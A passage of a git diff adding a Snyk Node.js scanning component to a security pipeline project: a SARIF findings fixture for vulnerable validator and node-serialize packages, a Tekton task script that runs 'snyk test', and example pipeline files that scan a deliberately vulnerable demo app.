"SNYK-JS-VALIDATOR-1090599", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable validator package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "validator@10.11.0" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to sequelize@6.6.5" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "package.json" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "sequelize@6.6.5" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JS-VALIDATOR-1090601", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable validator package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "validator@10.11.0" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to sequelize@6.6.5" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "package.json" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "sequelize@6.6.5" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JS-VALIDATOR-1090602", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable validator package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "validator@10.11.0" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to sequelize@6.6.5" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "package.json" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "sequelize@6.6.5" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "npm:node-serialize:20170208", + "level": "error", + "message": { + "text": "This file introduces a vulnerable node-serialize package with a critical severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "package.json" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "node-serialize@0.0.4" + } + ] + } + ] + } + ] + } + ] +} diff --git a/components/producers/snyk-node/task.yaml b/components/producers/snyk-node/task.yaml new file mode 100644 index 000000000..4585d7564 --- /dev/null +++ b/components/producers/snyk-node/task.yaml @@ -0,0 +1,72 @@ +--- +apiVersion: tekton.dev/v1beta1 +kind: Task +metadata: + name: producer-snyk-node + labels: + v1.dracon.ocurity.com/component: producer + v1.dracon.ocurity.com/test-type: sast + v1.dracon.ocurity.com/language: docpythoner +spec: + params: + - name: producer-snyk-node-api-key + type: string + description: Run Snyk For Javascript, Typescript, Node + volumes: + - name: scratch + emptyDir: {} + workspaces: + - name: output + description: The workspace containing the source-code to scan. + steps: + - name: run-snyk + imagePullPolicy: IfNotPresent + env: + - name: SNYK_INTEGRATION_VERSION + value: docker + + image: 'snyk/snyk:node' + script: | + #!/usr/bin/env bash + set -x + set +e + echo "authenticating to snyk" + snyk auth $(params.producer-snyk-node-api-key) + + baseDir = $(pwd) + if [ ! -d $(workspaces.output.path)/source-code/node_modules ]; then + cd $(workspaces.output.path)/source-code/ + npm install + exitCode=$? + if [[ $exitCode -eq 1 ]]; then + echo "npm install failed, trying yarn" + cd $(workspaces.output.path)/source-code/ + yarn install + + fi + fi + + cd $baseDir + echo "running snyk test" + snyk test --prune-repeated-subdependencies --skip-unresolved --sarif-file-output=/scratch/snyk.out $(workspaces.output.path)/source-code/ + exitCode=$? + if [[ $exitCode -ne 0 && $exitCode -ne 1 ]]; then + echo "Snyk failed with exit code $exitCode" + exit $exitCode + else + echo "Snyk completed successfully! exitcode $exitCode" + fi + volumeMounts: + - mountPath: /scratch + name: scratch + + - name: produce-issues + imagePullPolicy: IfNotPresent + image: '{{ default "ghcr.io/ocurity/dracon" .Values.image.registry }}/components/producers/snyk-docker:{{ .Chart.AppVersion }}' + command: ["/app/components/producers/snyk-docker/snyk-docker-parser"] + args: + - "-in=/scratch/snyk.out" + - "-out=$(workspaces.output.path)/.dracon/producers/snyk.pb" + volumeMounts: + - mountPath: /scratch + name: scratch diff --git a/examples/pipelines/snyk-node-project/kustomization.yaml b/examples/pipelines/snyk-node-project/kustomization.yaml new file mode 100644 index 000000000..2066a00b7 --- /dev/null +++ b/examples/pipelines/snyk-node-project/kustomization.yaml @@ -0,0 +1,12 @@ +--- +apiVersion: kustomize.config.k8s.io/v1beta1 +kind: Kustomization +nameSuffix: -snyk-node-project +components: + - pkg:helm/dracon-oss-components/base + - pkg:helm/dracon-oss-components/git-clone + - pkg:helm/dracon-oss-components/producer-snyk-node + - pkg:helm/dracon-oss-components/producer-aggregator + - pkg:helm/dracon-oss-components/enricher-custom-annotation + - pkg:helm/dracon-oss-components/enricher-aggregator + - pkg:helm/dracon-oss-components/consumer-stdout-json diff --git a/examples/pipelines/snyk-node-project/pipelinerun.yaml b/examples/pipelines/snyk-node-project/pipelinerun.yaml new file mode 100644 index 000000000..d29e6ef09 --- /dev/null +++ b/examples/pipelines/snyk-node-project/pipelinerun.yaml @@ -0,0 +1,22 @@ +--- +apiVersion: tekton.dev/v1beta1 +kind: PipelineRun +metadata: + generateName: dracon-snyk-node-project- +spec: + pipelineRef: + name: dracon-snyk-node-project + params: + - name: git-clone-url + value: https://github.com/appsecco/dvna.git + - name: producer-snyk-node-api-key + value: "$snyk-api-key" + workspaces: + - name: output + volumeClaimTemplate: + spec: + accessModes: + - ReadWriteOnce + resources: + requests: + storage: 1Gi